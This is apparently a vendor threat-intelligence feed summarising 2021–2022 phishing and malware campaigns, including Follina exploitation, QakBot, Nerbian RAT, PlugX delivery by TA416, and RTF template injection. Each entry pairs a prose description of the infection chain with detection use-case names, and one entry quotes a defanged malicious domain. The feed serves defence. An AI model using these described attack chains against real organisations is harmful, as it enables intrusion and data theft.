Follina Vulnerability Targets Government Entities

June 14, 2022

Follina Vulnerability Targets Government Entities

Industry: Government | Level: Tactical | Source: BleepingComputer

ProofPoint has identified the exploitation of CVE-2022-30190/Follina in phishing campaigns targeting European and US governments distributing malicious Rich Text Format (RTF) documents. The email attempts to lure victims with promises of salary increases to open the malicious document, once executed a PowerShell script downloads the attacker’s payload. As tweeted by ProofPoint, “Proofpoint blocked a suspected state-aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.” The payload, as analyzed by BleepingComputer, identified the reconnaissance activity to gather large amounts of data. Attribution of the attacker are currently unknown, although ProofPoint’s early findings suggests a state aligned actor.

Anvilogic Scenario:

  • CVE-2022-30190 / Follina : Attack Chain

Anvilogic Use Case:

  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

QakBot Exploiting Windows MSDT CVE-2022-30190

June 14, 2022

QakBot Exploiting Windows MSDT CVE-2022-30190

Industry: N/A | Level: Tactical | Source: BleepingComputer

ProofPoint’s tracking of CVE-2022-30190 identified Qakbot/Qbot affiliate TA570, distributing the Qbot malware using the MSDT zero-day exploit. Attackers are utilizing hijacked email threads to send emails attached with malicious IMG files containing a Word document, a shortcut/LNK file, and the QBot DLL. The LNK file loads the Qbot DLL file from the IMG. The Word document downloads an HTML file exploiting the CVE-2022-30190 vulnerability, causing the PowerShell code to execute and download additional payloads. The threat group, TA570 has been identified as adaptable and open to experimenting with new tactics in their phishing campaigns. From this year the threat group has distributed QBot with Squiblydoo techniques in February and following Microsoft’s autoblock of macros, in April 2022 TA570 distributed malicious MSI files contained within ZIP archives.

Anvilogic Use Cases:

  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

Chinese Hackers Exploit Microsoft Office Latest Zero-Day CVE-2022-30190

June 07, 2022

Chinese Hackers Exploit Microsoft Office Latest Zero-Day CVE-2022-30190

Industry: N/A | Level: Tactical | Source: BleepingComputer

Proofpoint has identified a Chinese state-linked threat group, TA413 to be actively exploiting Microsoft Office’s latest zero-day, CVE-2022-30190. The observed attack was targeting the international Tibetan community and was delivered in a compressed zip archive. As tweeted by ProofPoint, “TA413 CN APT spotted ITW exploiting the #Follina #0Day using URLs to deliver Zip Archives which contain Word Documents that use the technique. Campaigns impersonate the “Women Empowerments Desk” of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.”

Anvilogic Scenario:

  • CVE-2022-30190 / Follina : Attack Chain

Anvilogic Use Cases:

  • Compressed File Execution
  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

Phishing with World Health Organization Themes

May 17, 2022

Phishing with World Health Organization Themes

Industry: N/A | Level: Tactical | Source: ProofPoint

Research from ProofPoint has identified the distribution of Nerbian remote access trojan (RAT), through phishing emails using COVID-19 and World Health Organization themes. The threat campaign was traced back to getting its start April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. Emails delivered contain either a malicious document or a compressed archive containing a malicious document. The process flow upon the execution of the embedded macro is, CMD calls PowerShell to download a BAT file, the BAT file launches the PowerShell to download additional payloads including the malicious RAT. The RAT establishes persistence and has the capabilities to download additional payloads as needed. There is currently no attribution placed on the Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks

 

Serpent Backdoor Malware

March 29, 2022

Research from ProofPoint, identifies a phishing campaign aimed at French entities in industries for construction, government and real estate.

TA416

March 15, 2022

TA416

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update for activity since November 2021, involving Chinese APT group TA416, initiating targeted campaigns against European Diplomatic entities. An increase in activity has been observed since the invasion with Russia in Ukraine has taken place.  A new technique was identified in the group’s phishing campaigns.  Initiallythe threat group utilizes web bugs to profile victims to provide a “sign of life,” indicating to the attackers the victim is active and can be enticed into opening malicious emails. Phishing emails have then been observed to be leveraging “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service field while using a unique sender address generated by the service.” The abuse of the SMTP2Go service has enabled the group to impersonate different European organizations. When sending the malicious phishing emails, the threat actor provides a DropBox link containing the malware executable, PlugX in a zip file. Upon execution, the malware establishes persistence through DLL Search Order hijacking using PE file potplayermini.exe associated with a public media player and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk

TA2541

February 22, 2022

TA2541

Industry: Aerospace, Aviation, Defense, Manufacturing & Transportation | Level: Tactical | Source: ProofPoint

ProofPoint provides research for threat actor group TA2541 that has been observed since 2017 targeting “aviation, aerospace, transportation, and defense industries, among others.” The group distributes malicious remote access trojans (RATs) through crafted phishing emails containing malicious links. Following the execution of the malicious link, a vbs file is downloaded invoking PowerShell to download a malicious executable that establishes persistence through process injection. Additional activities for system tampering to lower defenses and system information discovery is initiated prior to the download of the RAT. The threat actor group utilizes a large variety of commodity RATs such as AsyncRAT, NetWire, Parallax and others. The RAT will establish persistence in the startup directory as well as using schtasks. The threat actor’s motives and objectives have yet to be identified.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Wscript/Cscript Execution
    • Powershell DLL/EXE Injection
    • New AutoRun Registry Key

“OiVaVoii” Threat Campaign

February 01, 2022

“OiVaVoii” Threat Campaign

Industry: N/A | Level: Tactical | Source: ProofPoint

ProofPoint has been observing a threat campaign, OiVaVoii, since January 18th, 2022. It utilizes hijacked Office 365 tenants to send malicious OAuth applications with specifically crafted lures to phish targets. These apps would be leveraged to send authorization requests to targets and if authorized, a generated OAuth token could be obtained by the attacker to complete the account takeover. There are currently five identified malicious OAuth apps with three having a “Verified” publish type, one with “Unverified” and the last “Unknown.” The threat actors have mainly targeted high-level executives and to date Microsoft has blocked four of the five identified apps.

  • Anvilogic Use Case: Azure Consent Grant

RTF Template Injection

December 01, 2021

RTF Template Injection

Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint

Proofpoint has observed increased usage of RTF template injections from threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021 with files publicly identified on April 5th. The template injections enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique. APT group DoNot Team and TA423 are both associated with targeting Malaysia’s Deepwater energy exploration, while APT actor, Gamaredon, targeted the Ukrainian government.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Abuse EQNEDT32.EXE CVE-2017-11882